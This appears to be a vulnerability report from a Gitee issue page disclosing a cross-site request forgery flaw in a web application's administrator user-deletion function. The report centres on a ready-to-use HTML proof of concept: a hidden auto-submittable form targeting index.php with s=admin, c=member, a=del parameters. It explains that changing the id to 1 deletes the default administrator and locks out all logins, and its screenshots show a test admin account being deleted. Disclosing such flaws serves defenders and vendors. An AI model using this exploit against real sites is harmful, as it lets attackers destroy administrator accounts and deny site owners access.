There is a CSRF vulnerability in the administrator account

After the administrator logs in, open this page

User list:

delete.html --Delete User
POC:
```
<html>

<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.154.82:81/index.php">
    <input type="hidden" name="s" value="admin" />
    <input type="hidden" name="c" value="member" />
    <input type="hidden" name="a" value="del" />
    <input type="hidden" name="modelid" value="6" />
    <input type="hidden" name="id" value="2" />
    <input type="submit" value="Submit request" />
</form>
</body>
</html>
```
Among them, in name="id" value="2" the admin account ID of the default system administrator is 1. 
Changing the value="2" to 1 can delete the default administrator account that comes with the system, 
which makes it impossible to log in!
The test screenshot is as follows:

![输入图片说明](https://foruda.gitee.com/images/1666064342136939556/4cd3f82a_8192872.png "10010.png")
A new system administrator account named kali is created here to verify the deletion of the CSRF
![输入图片说明](https://foruda.gitee.com/images/1666064448203030839/37cb3d6b_8192872.png "10011.png")
BurpSuite grabs the data package and sends it to the CSRF generation module of Engagement tools
![输入图片说明](https://foruda.gitee.com/images/1666064567755554388/2a910ff9_8192872.png "10012.png")
![输入图片说明](https://foruda.gitee.com/images/1666064591704098260/ba76de62_8192872.png "10013.png")
Save the contents of the POC CSRF as delete.html, and then open it
![输入图片说明](https://foruda.gitee.com/images/1666064775790071471/cb8cc9e7_8192872.png "10016.png")
![输入图片说明](https://foruda.gitee.com/images/1666064787697684904/b24beffb_8192872.png "10014.png")
![输入图片说明](https://foruda.gitee.com/images/1666064800660537433/cb9a782f_8192872.png "10017.png")
Visible, the kali system administrator account has been deleted

Pwn师傅/Pwn

Content Risk Flag

Comments (0)

Pwn师傅/Pwn .gitee-modal { width: 500px !important; }

Content Risk Flag